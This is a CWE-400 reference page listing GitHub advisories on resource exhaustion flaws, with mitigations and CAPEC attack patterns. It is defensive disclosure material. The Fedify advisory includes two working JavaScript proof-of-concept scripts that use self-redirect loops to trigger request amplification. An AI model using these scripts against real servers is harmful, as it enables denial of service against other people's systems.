CWE-400
DiscouragedUncontrolled Resource Consumption
Abstraction: Class · Status: Draft
The product does not properly control the allocation and maintenance of a limited resource.
5421 vulnerabilities reference this CWE, most recent first.
GHSA-GJJX-GQM4-WCGM
Vulnerability from github – Published: 2022-05-13 01:33 – Updated: 2022-06-29 23:28It was found that URLResource.getLastModified() in Undertow closes the file descriptors only when they are finalized which can cause file descriptors to exhaust. This leads to a file handler leak.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.4.24.FInal"
},
"package": {
"ecosystem": "Maven",
"name": "io.undertow:undertow-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.25.Final"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.0.4.Final"
},
"package": {
"ecosystem": "Maven",
"name": "io.undertow:undertow-core"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0.Alpha1"
},
{
"fixed": "2.0.5.Final"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2018-1114"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2022-06-29T23:28:47Z",
"nvd_published_at": "2018-09-11T15:29:00Z",
"severity": "MODERATE"
},
"details": "It was found that URLResource.getLastModified() in Undertow closes the file descriptors only when they are finalized which can cause file descriptors to exhaust. This leads to a file handler leak.",
"id": "GHSA-gjjx-gqm4-wcgm",
"modified": "2022-06-29T23:28:47Z",
"published": "2022-05-13T01:33:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1114"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2018:2643"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2018:2669"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2019:0877"
},
{
"type": "WEB",
"url": "https://bugs.openjdk.java.net/browse/JDK-6956385"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-1114"
},
{
"type": "WEB",
"url": "https://issues.jboss.org/browse/UNDERTOW-1338"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Uncontrolled Resource Consumption in Undertow"
}
GHSA-GM5R-35XQ-QR9C
Vulnerability from github – Published: 2023-02-12 06:30 – Updated: 2023-02-21 21:30In log service, there is a missing permission check. This could lead to local denial of service in log service.
{
"affected": [],
"aliases": [
"CVE-2022-47356"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-02-12T04:15:00Z",
"severity": "MODERATE"
},
"details": "In log service, there is a missing permission check. This could lead to local denial of service in log service.",
"id": "GHSA-gm5r-35xq-qr9c",
"modified": "2023-02-21T21:30:19Z",
"published": "2023-02-12T06:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-47356"
},
{
"type": "WEB",
"url": "https://www.unisoc.com/en_us/secy/announcementDetail/1621031430231134210"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GM5R-P3X6-43H6
Vulnerability from github – Published: 2023-09-22 06:30 – Updated: 2024-04-04 07:48In nqptp-message-handlers.c in nqptp before 1.2.3, crafted packets received on the control port could crash the program.
{
"affected": [],
"aliases": [
"CVE-2023-43771"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-09-22T06:15:10Z",
"severity": "MODERATE"
},
"details": "In nqptp-message-handlers.c in nqptp before 1.2.3, crafted packets received on the control port could crash the program.",
"id": "GHSA-gm5r-p3x6-43h6",
"modified": "2024-04-04T07:48:15Z",
"published": "2023-09-22T06:30:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43771"
},
{
"type": "WEB",
"url": "https://github.com/mikebrady/nqptp/commit/b24789982d5cc067ecf6e8f3352b701d177530ec"
},
{
"type": "WEB",
"url": "https://github.com/mikebrady/nqptp/releases/tag/1.2.3"
},
{
"type": "WEB",
"url": "https://github.com/mikebrady/nqptp/releases/tag/1.2.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GM99-G636-34FH
Vulnerability from github – Published: 2026-01-28 18:30 – Updated: 2026-01-29 18:31A device-ID validation flaw in OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) by calling flow.cuda.synchronize() with an invalid or out-of-range GPU device index.
{
"affected": [],
"aliases": [
"CVE-2025-65890"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-28T17:16:08Z",
"severity": "HIGH"
},
"details": "A device-ID validation flaw in OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) by calling flow.cuda.synchronize() with an invalid or out-of-range GPU device index.",
"id": "GHSA-gm99-g636-34fh",
"modified": "2026-01-29T18:31:42Z",
"published": "2026-01-28T18:30:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65890"
},
{
"type": "WEB",
"url": "https://github.com/Oneflow-Inc/oneflow/issues/10662"
},
{
"type": "WEB",
"url": "https://github.com/Daisy2ang"
},
{
"type": "WEB",
"url": "https://github.com/Oneflow-Inc/oneflow"
},
{
"type": "WEB",
"url": "http://oneflow.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GM9G-2G8V-FVXJ
Vulnerability from github – Published: 2019-06-06 15:32 – Updated: 2021-09-16 20:59All versions of upmerge are vulnerable to Prototype Pollution. The merge() function fails to prevent user input to alter an Object's prototype, allowing attackers to modify override properties of all objects in the application. This may lead to Denial of Service or may be chained with other vulnerabilities leading to Remote Code Execution.
Recommendation
No fix is currently available. Consider using an alternative module until a fix is made available.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "upmerge"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.1.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-345",
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2019-06-06T10:04:57Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "All versions of `upmerge` are vulnerable to Prototype Pollution. The merge() function fails to prevent user input to alter an Object\u0027s prototype, allowing attackers to modify override properties of all objects in the application. This may lead to Denial of Service or may be chained with other vulnerabilities leading to Remote Code Execution.\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative module until a fix is made available.\n",
"id": "GHSA-gm9g-2g8v-fvxj",
"modified": "2021-09-16T20:59:20Z",
"published": "2019-06-06T15:32:28Z",
"references": [
{
"type": "WEB",
"url": "https://hackerone.com/reports/439120"
},
{
"type": "PACKAGE",
"url": "https://github.com/jazzfog/UpMerge"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-UPMERGE-174133"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/809"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Prototype Pollution in upmerge"
}
GHSA-GM9H-7XVC-JG2F
Vulnerability from github – Published: 2022-05-24 16:58 – Updated: 2024-09-10 12:30A vulnerability has been identified in CP1604 (All versions < V2.8), CP1616 (All versions < V2.8), Development/Evaluation Kits for PROFINET IO: DK Standard Ethernet Controller (All versions < V4.1.1 Patch 05), Development/Evaluation Kits for PROFINET IO: EK-ERTEC 200 (All versions < V4.5.0 Patch 01), Development/Evaluation Kits for PROFINET IO: EK-ERTEC 200P (All versions < V4.5.0), SCALANCE X-200IRT (All versions < V5.2.1), SIMATIC ET 200M (All versions), SIMATIC ET 200S (All versions), SIMATIC ET 200ecoPN (except 6ES7148-6JD00-0AB0 and 6ES7146-6FF00-0AB0) (All versions), SIMATIC ET 200pro (All versions), SIMATIC PN/PN Coupler 6ES7158-3AD01-0XA0 (All versions), SIMATIC S7-300 CPU family (incl. F) (All versions), SIMATIC S7-400 (incl. F) V6 and below (All versions), SIMATIC S7-400 PN/DP V7 (incl. F) (All versions), SIMATIC WinAC RTX (F) 2010 (All versions < SIMATIC WinAC RTX 2010 SP3), SIMOTION (All versions), SINAMICS DCM (All versions < V1.5 HF1), SINAMICS DCP (All versions), SINAMICS G110M V4.7 (Control Unit) (All versions < V4.7 SP10 HF5), SINAMICS G120 V4.7 (Control Unit) (All versions < V4.7 SP10 HF5), SINAMICS G130 V4.7 (Control Unit) (All versions < V4.7 HF29), SINAMICS G150 (Control Unit) (All versions < V4.8), SINAMICS GH150 V4.7 (Control Unit) (All versions), SINAMICS GL150 V4.7 (Control Unit) (All versions), SINAMICS GM150 V4.7 (Control Unit) (All versions), SINAMICS S110 (Control Unit) (All versions), SINAMICS S120 V4.7 (Control Unit and CBE20) (All versions < V4.7 HF34), SINAMICS S150 (Control Unit) (All versions < V4.8), SINAMICS SL150 V4.7 (Control Unit) (All versions), SINAMICS SM120 V4.7 (Control Unit) (All versions), SINUMERIK 828D (All versions < V4.8 SP5), SINUMERIK 840D sl (All versions). An attacker with network access to an affected product may cause a Denial-of-Service condition by breaking the real-time synchronization (IRT) of the affected installation. The security vulnerability could be exploited by an unauthenticated attacker with network access to the affected installation. No user interaction is required to exploit this security vulnerability. The vulnerability impacts the availability of the affected installations.
{
"affected": [],
"aliases": [
"CVE-2019-10923"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-10-10T14:15:00Z",
"severity": "MODERATE"
},
"details": "A vulnerability has been identified in CP1604 (All versions \u003c V2.8), CP1616 (All versions \u003c V2.8), Development/Evaluation Kits for PROFINET IO: DK Standard Ethernet Controller (All versions \u003c V4.1.1 Patch 05), Development/Evaluation Kits for PROFINET IO: EK-ERTEC 200 (All versions \u003c V4.5.0 Patch 01), Development/Evaluation Kits for PROFINET IO: EK-ERTEC 200P (All versions \u003c V4.5.0), SCALANCE X-200IRT (All versions \u003c V5.2.1), SIMATIC ET 200M (All versions), SIMATIC ET 200S (All versions), SIMATIC ET 200ecoPN (except 6ES7148-6JD00-0AB0 and 6ES7146-6FF00-0AB0) (All versions), SIMATIC ET 200pro (All versions), SIMATIC PN/PN Coupler 6ES7158-3AD01-0XA0 (All versions), SIMATIC S7-300 CPU family (incl. F) (All versions), SIMATIC S7-400 (incl. F) V6 and below (All versions), SIMATIC S7-400 PN/DP V7 (incl. F) (All versions), SIMATIC WinAC RTX (F) 2010 (All versions \u003c SIMATIC WinAC RTX 2010 SP3), SIMOTION (All versions), SINAMICS DCM (All versions \u003c V1.5 HF1), SINAMICS DCP (All versions), SINAMICS G110M V4.7 (Control Unit) (All versions \u003c V4.7 SP10 HF5), SINAMICS G120 V4.7 (Control Unit) (All versions \u003c V4.7 SP10 HF5), SINAMICS G130 V4.7 (Control Unit) (All versions \u003c V4.7 HF29), SINAMICS G150 (Control Unit) (All versions \u003c V4.8), SINAMICS GH150 V4.7 (Control Unit) (All versions), SINAMICS GL150 V4.7 (Control Unit) (All versions), SINAMICS GM150 V4.7 (Control Unit) (All versions), SINAMICS S110 (Control Unit) (All versions), SINAMICS S120 V4.7 (Control Unit and CBE20) (All versions \u003c V4.7 HF34), SINAMICS S150 (Control Unit) (All versions \u003c V4.8), SINAMICS SL150 V4.7 (Control Unit) (All versions), SINAMICS SM120 V4.7 (Control Unit) (All versions), SINUMERIK 828D (All versions \u003c V4.8 SP5), SINUMERIK 840D sl (All versions). An attacker with network access to an affected product may cause a Denial-of-Service condition by breaking the real-time synchronization (IRT) of the affected installation. The security vulnerability could be exploited by an unauthenticated attacker with network access to the affected installation. No user interaction is required to exploit this security vulnerability. The vulnerability impacts the availability of the affected installations.",
"id": "GHSA-gm9h-7xvc-jg2f",
"modified": "2024-09-10T12:30:33Z",
"published": "2022-05-24T16:58:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10923"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-349422.html"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-349422.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GM9M-GWC4-HWGP
Vulnerability from github – Published: 2026-04-07 18:04 – Updated: 2026-06-09 11:00Summary
@fedify/fedify follows HTTP redirects recursively in its remote document loader and authenticated document loader without enforcing a maximum redirect count or visited-URL loop detection. An attacker who controls a remote ActivityPub key or actor URL can force a server using Fedify to make repeated outbound requests from a single inbound request, leading to resource consumption and denial of service.
Details
Fedify verifies ActivityPub HTTP signatures by fetching the remote keyId during request processing. The relevant flow is handleInboxInternal() -> verifyRequest() -> fetchKeyInternal() -> document loader.
In affected versions:
- the generic document loader recursively follows 3xx responses by calling load() again on the Location header
- the authenticated redirect path (doubleKnock()) also recursively follows redirects
- neither path enforces a redirect cap or tracks visited URLs to detect self-referential redirect loops
As a result, if an attacker-controlled keyId or actor URL responds with 302 Location: <same URL>, a single ActivityPub request can trigger tens or hundreds of outbound requests before the fetch completes or the request times out.
I confirmed the issue in @fedify/fedify 1.9.1 and 1.9.2. By contrast, Fedify's WebFinger lookup path already has a redirect cap, which suggests the missing bound in the document loader is unintended.
Failed key fetches are not durably negatively cached. After a failed lookup, the null result is only remembered in a request-local cache, so later requests can trigger the same redirect loop again for the same keyId.
PoC
Minimal direct reproduction with the package:
- Install
@fedify/fedify@1.9.2. - Save and run the following script:
import http from "node:http";
import { getDocumentLoader } from "@fedify/fedify";
const port = 45679;
let count = 0;
const redirectCount = 120;
const server = http.createServer((req, res) => {
count += 1;
if (count < redirectCount) {
res.writeHead(302, {
Location: `http://127.0.0.1:${port}/actor`,
});
res.end();
return;
}
res.writeHead(200, { "Content-Type": "application/activity+json" });
res.end(JSON.stringify({
"@context": "https://www.w3.org/ns/activitystreams",
"id": `http://127.0.0.1:${port}/actor`,
"type": "Person"
}));
});
await new Promise((resolve) => server.listen(port, "127.0.0.1", resolve));
try {
const loader = getDocumentLoader({ allowPrivateAddress: true });
await loader(`http://127.0.0.1:${port}/actor`);
console.log({ count });
} finally {
server.close();
}
- Observe output similar to:
{ count: 120 }
This shows the loader followed 119 self-redirects before the first non-redirect response.
The authenticated loader used for signed requests shows the same behavior:
import http from "node:http";
import {
generateCryptoKeyPair,
getAuthenticatedDocumentLoader,
} from "@fedify/fedify";
const port = 45680;
let count = 0;
const redirectCount = 120;
const server = http.createServer((req, res) => {
count += 1;
if (count < redirectCount) {
res.writeHead(302, {
Location: `http://127.0.0.1:${port}/actor`,
});
res.end();
return;
}
res.writeHead(200, { "Content-Type": "application/activity+json" });
res.end(JSON.stringify({
"@context": "https://www.w3.org/ns/activitystreams",
"id": `http://127.0.0.1:${port}/actor`,
"type": "Person"
}));
});
await new Promise((resolve) => server.listen(port, "127.0.0.1", resolve));
try {
const { privateKey } = await generateCryptoKeyPair();
const loader = getAuthenticatedDocumentLoader(
{
privateKey,
keyId: new URL("https://example.com/users/index#main-key"),
},
{ allowPrivateAddress: true },
);
await loader(`http://127.0.0.1:${port}/actor`);
console.log({ count });
} finally {
server.close();
}
Impact
This is an unauthenticated denial-of-service / request amplification issue. Any Fedify-based server that verifies remote keys or loads remote ActivityPub documents can be forced to spend CPU time, worker time, connection slots, and outbound bandwidth following attacker-controlled redirects. A single inbound request can trigger a large number of outbound requests, and the attack can be repeated across requests because failed lookups are not durably negatively cached.
Misc Notes
This issue was surfaced by a Ghost ActivityPub user reporting the issue directly to Ghost. The above report was generated upon further investigation into the issue by the Ghost team. We credit @wrathsec for the discovery.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@fedify/fedify"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.9.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@fedify/vocab-runtime"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@fedify/vocab-runtime"
},
"ranges": [
{
"events": [
{
"introduced": "2.1.0"
},
{
"fixed": "2.1.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"2.1.0"
]
},
{
"package": {
"ecosystem": "npm",
"name": "@fedify/fedify"
},
"ranges": [
{
"events": [
{
"introduced": "1.10.0"
},
{
"fixed": "1.10.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@fedify/fedify"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.0.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@fedify/fedify"
},
"ranges": [
{
"events": [
{
"introduced": "2.1.0"
},
{
"fixed": "2.1.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"2.1.0"
]
}
],
"aliases": [
"CVE-2026-34148"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-07T18:04:09Z",
"nvd_published_at": "2026-04-06T16:16:34Z",
"severity": "HIGH"
},
"details": "### Summary\n\n`@fedify/fedify` follows HTTP redirects recursively in its remote document loader and authenticated document loader without enforcing a maximum redirect count or visited-URL loop detection. An attacker who controls a remote ActivityPub key or actor URL can force a server using Fedify to make repeated outbound requests from a single inbound request, leading to resource consumption and denial of service.\n\n### Details\n\nFedify verifies ActivityPub HTTP signatures by fetching the remote `keyId` during request processing. The relevant flow is `handleInboxInternal()` -\u003e `verifyRequest()` -\u003e `fetchKeyInternal()` -\u003e document loader.\n\nIn affected versions:\n- the generic document loader recursively follows `3xx` responses by calling `load()` again on the `Location` header\n- the authenticated redirect path (`doubleKnock()`) also recursively follows redirects\n- neither path enforces a redirect cap or tracks visited URLs to detect self-referential redirect loops\n\nAs a result, if an attacker-controlled `keyId` or actor URL responds with `302 Location: \u003csame URL\u003e`, a single ActivityPub request can trigger tens or hundreds of outbound requests before the fetch completes or the request times out.\n\nI confirmed the issue in `@fedify/fedify` 1.9.1 and 1.9.2. By contrast, Fedify\u0027s WebFinger lookup path already has a redirect cap, which suggests the missing bound in the document loader is unintended.\n\nFailed key fetches are not durably negatively cached. After a failed lookup, the null result is only remembered in a request-local cache, so later requests can trigger the same redirect loop again for the same `keyId`.\n\n### PoC\n\nMinimal direct reproduction with the package:\n\n1. Install `@fedify/fedify@1.9.2`.\n2. Save and run the following script:\n\n```js\nimport http from \"node:http\";\nimport { getDocumentLoader } from \"@fedify/fedify\";\n\nconst port = 45679;\nlet count = 0;\nconst redirectCount = 120;\n\nconst server = http.createServer((req, res) =\u003e {\n count += 1;\n\n if (count \u003c redirectCount) {\n res.writeHead(302, {\n Location: `http://127.0.0.1:${port}/actor`,\n });\n res.end();\n return;\n }\n\n res.writeHead(200, { \"Content-Type\": \"application/activity+json\" });\n res.end(JSON.stringify({\n \"@context\": \"https://www.w3.org/ns/activitystreams\",\n \"id\": `http://127.0.0.1:${port}/actor`,\n \"type\": \"Person\"\n }));\n});\n\nawait new Promise((resolve) =\u003e server.listen(port, \"127.0.0.1\", resolve));\n\ntry {\n const loader = getDocumentLoader({ allowPrivateAddress: true });\n await loader(`http://127.0.0.1:${port}/actor`);\n console.log({ count });\n} finally {\n server.close();\n}\n```\n\n3. Observe output similar to:\n\n```\n{ count: 120 }\n```\n\nThis shows the loader followed 119 self-redirects before the first non-redirect response.\n\nThe authenticated loader used for signed requests shows the same behavior:\n\n```\nimport http from \"node:http\";\nimport {\n generateCryptoKeyPair,\n getAuthenticatedDocumentLoader,\n} from \"@fedify/fedify\";\n\nconst port = 45680;\nlet count = 0;\nconst redirectCount = 120;\n\nconst server = http.createServer((req, res) =\u003e {\n count += 1;\n\n if (count \u003c redirectCount) {\n res.writeHead(302, {\n Location: `http://127.0.0.1:${port}/actor`,\n });\n res.end();\n return;\n }\n\n res.writeHead(200, { \"Content-Type\": \"application/activity+json\" });\n res.end(JSON.stringify({\n \"@context\": \"https://www.w3.org/ns/activitystreams\",\n \"id\": `http://127.0.0.1:${port}/actor`,\n \"type\": \"Person\"\n }));\n});\n\nawait new Promise((resolve) =\u003e server.listen(port, \"127.0.0.1\", resolve));\n\ntry {\n const { privateKey } = await generateCryptoKeyPair();\n const loader = getAuthenticatedDocumentLoader(\n {\n privateKey,\n keyId: new URL(\"https://example.com/users/index#main-key\"),\n },\n { allowPrivateAddress: true },\n );\n\n await loader(`http://127.0.0.1:${port}/actor`);\n console.log({ count });\n} finally {\n server.close();\n}\n```\n\n### Impact\n\nThis is an unauthenticated denial-of-service / request amplification issue. Any Fedify-based server that verifies remote keys or loads remote ActivityPub documents can be forced to spend CPU time, worker time, connection slots, and outbound bandwidth following attacker-controlled redirects. A single inbound request can trigger a large number of outbound requests, and the attack can be repeated across requests because failed lookups are not durably negatively cached.\n\n### Misc Notes\n\nThis issue was surfaced by a Ghost ActivityPub user reporting the issue directly to Ghost. The above report was generated upon further investigation into the issue by the Ghost team. We credit @wrathsec for the discovery.",
"id": "GHSA-gm9m-gwc4-hwgp",
"modified": "2026-06-09T11:00:52Z",
"published": "2026-04-07T18:04:09Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/fedify-dev/fedify/security/advisories/GHSA-gm9m-gwc4-hwgp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34148"
},
{
"type": "PACKAGE",
"url": "https://github.com/fedify-dev/fedify"
},
{
"type": "WEB",
"url": "https://github.com/fedify-dev/fedify/releases/tag/1.10.5"
},
{
"type": "WEB",
"url": "https://github.com/fedify-dev/fedify/releases/tag/1.9.6"
},
{
"type": "WEB",
"url": "https://github.com/fedify-dev/fedify/releases/tag/2.0.8"
},
{
"type": "WEB",
"url": "https://github.com/fedify-dev/fedify/releases/tag/2.1.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Fedify affected by resource exhaustion caused by unbounded redirect following during remote key/document resolution"
}
GHSA-GMJX-74CX-5P3F
Vulnerability from github – Published: 2024-10-22 18:32 – Updated: 2025-02-25 09:32A denial of service (DoS) vulnerability was found in OpenShift. This flaw allows attackers to exploit the GraphQL batching functionality. The vulnerability arises when multiple queries can be sent within a single request, enabling an attacker to submit a request containing thousands of aliases in one query. This issue causes excessive resource consumption, leading to application unavailability for legitimate users.
{
"affected": [],
"aliases": [
"CVE-2024-50311"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-770"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-22T14:15:19Z",
"severity": "MODERATE"
},
"details": "A denial of service (DoS) vulnerability was found in OpenShift. This flaw allows attackers to exploit the GraphQL batching functionality. The vulnerability arises when multiple queries can be sent within a single request, enabling an attacker to submit a request containing thousands of aliases in one query. This issue causes excessive resource consumption, leading to application unavailability for legitimate users.",
"id": "GHSA-gmjx-74cx-5p3f",
"modified": "2025-02-25T09:32:34Z",
"published": "2024-10-22T18:32:11Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50311"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:6122"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2024-50311"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2319379"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GMQQ-HRF4-4GVF
Vulnerability from github – Published: 2022-05-24 17:37 – Updated: 2022-05-24 17:37When a BIG-IP ASM or Advanced WAF system running version 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, 14.1.0-14.1.3, 13.1.0-13.1.3.4, 12.1.0-12.1.5.2, or 11.6.1-11.6.5.2 processes requests with JSON payload, an unusually large number of parameters can cause excessive CPU usage in the BIG-IP ASM bd process.
{
"affected": [],
"aliases": [
"CVE-2020-27718"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-12-24T15:15:00Z",
"severity": "HIGH"
},
"details": "When a BIG-IP ASM or Advanced WAF system running version 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, 14.1.0-14.1.3, 13.1.0-13.1.3.4, 12.1.0-12.1.5.2, or 11.6.1-11.6.5.2 processes requests with JSON payload, an unusually large number of parameters can cause excessive CPU usage in the BIG-IP ASM bd process.",
"id": "GHSA-gmqq-hrf4-4gvf",
"modified": "2022-05-24T17:37:13Z",
"published": "2022-05-24T17:37:13Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27718"
},
{
"type": "WEB",
"url": "https://support.f5.com/csp/article/K58102101"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-GP4V-QVH9-46X6
Vulnerability from github – Published: 2022-05-24 17:00 – Updated: 2024-04-04 02:35qtum through 0.16 (a chain-based proof-of-stake cryptocurrency) allows a remote denial of service. The attacker sends invalid headers/blocks. The attack requires no stake and can fill the victim's disk and RAM.
{
"affected": [],
"aliases": [
"CVE-2018-19151"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-10-29T20:15:00Z",
"severity": "HIGH"
},
"details": "qtum through 0.16 (a chain-based proof-of-stake cryptocurrency) allows a remote denial of service. The attacker sends invalid headers/blocks. The attack requires no stake and can fill the victim\u0027s disk and RAM.",
"id": "GHSA-gp4v-qvh9-46x6",
"modified": "2024-04-04T02:35:48Z",
"published": "2022-05-24T17:00:01Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-19151"
},
{
"type": "WEB",
"url": "https://medium.com/%40dsl_uiuc/fake-stake-attacks-on-chain-based-proof-of-stake-cryptocurrencies-b8b05723f806"
},
{
"type": "WEB",
"url": "https://medium.com/@dsl_uiuc/fake-stake-attacks-on-chain-based-proof-of-stake-cryptocurrencies-b8b05723f806"
},
{
"type": "WEB",
"url": "http://fc19.ifca.ai/preproceedings/180-preproceedings.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.
Mitigation
- Mitigation of resource exhaustion attacks requires that the target system either:
- The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.
- The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker.
- recognizes the attack and denies that user further access for a given amount of time, or
- uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed.
Mitigation
Ensure that protocols have specific limits of scale placed on them.
Mitigation
Ensure that all failures in resource allocation place the system into a safe posture.
CAPEC-147: XML Ping of the Death
An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.
CAPEC-227: Sustained Client Engagement
An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource.
CAPEC-492: Regular Expression Exponential Blowup
An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.